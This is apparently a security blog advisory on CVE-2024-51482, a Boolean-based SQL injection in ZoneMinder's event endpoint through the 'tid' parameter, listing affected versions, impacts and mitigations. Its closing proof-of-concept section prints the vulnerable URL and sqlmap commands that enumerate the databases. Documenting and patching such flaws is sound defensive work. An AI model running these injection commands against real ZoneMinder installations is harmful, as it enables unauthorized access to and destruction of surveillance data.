SQL Injection in ZoneMinder – CVE-2024-51482

Posted on

Vulnerable Version

ZoneMinder v1.37.* <= 1.37.64

Fixed Version

Patched versions 1.37.65

Base Score

9.9 Critical                                                                        

Vendor Description:-

ZoneMinder is an open-source, free software program for closed-circuit television monitoring that was created to operate on Linux and FreeBSD and made available under the GNU General Public License (GPL).

ZoneMinder is controlled by users through an online interface. The application can make use of IP-based camera equipment or conventional cameras (via a capture card, USB, FireWire, etc.).

CVE-2024-51482 Vulnerability Description: –

The flaw stems from a Boolean-based SQL injection vulnerability in the web/ajax/event.php function, where inadequate validation of the “tagId” parameter permits direct SQL query manipulation. Researchers found that the “tagId” value is directly integrated into SQL commands without proper security checks, making it possible for attackers to exploit this vulnerability through specially crafted requests.

For instance, an attacker could send a URL like http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1, injecting SQL code via the “tid” parameter to execute arbitrary SQL commands. This could include dangerous operations such as DELETE statements to delete data or SLEEP commands to induce Denial of Service (DoS) by slowing down the system.

Implications

The implications of this SQL Injection vulnerability are substantial. It allows attackers to execute arbitrary SQL commands, potentially granting unauthorized access to sensitive data within the database. In a worst-case scenario, attackers could gain full control of the affected systems, manipulate database entries, or cause service disruptions, posing a threat to the operational integrity of the ZoneMinder software

Mitigations

  • Update ZoneMinder right away to version 1.37.65 or higher, which has updates to address the vulnerability.
  • Applications, databases, servers, and network equipment should all be routinely hardened and set securely, according to security administrators.
  • Regular backups must be made by system administrators and kept offline or on a different network.
  • Using a password manager, users should create strong, one-of-a-kind passwords for every website and, if at all feasible, enable Multi-Factor Authentication (MFA).
  • Users should be on the lookout for phishing and social engineering tactics and refrain from downloading dubious apps or attachments.

POC

Although it is not possible to execute the command directly through directory, after reading the documents, here is the url:

http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1

and the function tid is vulnerable to SQL Injection.
I used sqlmap to automate the exploitation process through this command:

sqlmap -u 'http://hostname_or_ip/zm/index.php view=request&request=event&action=removetag&tid=1'
image 22

then extract all database


sqlmap -u ‘http://hostname_or_ip/zm/index.php view=request&request=event&action=removetag&tid=1’ –dbs

image 23

POC Video:-

Reference: –

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3

Leave a Reply

Your email address will not be published. Required fields are marked *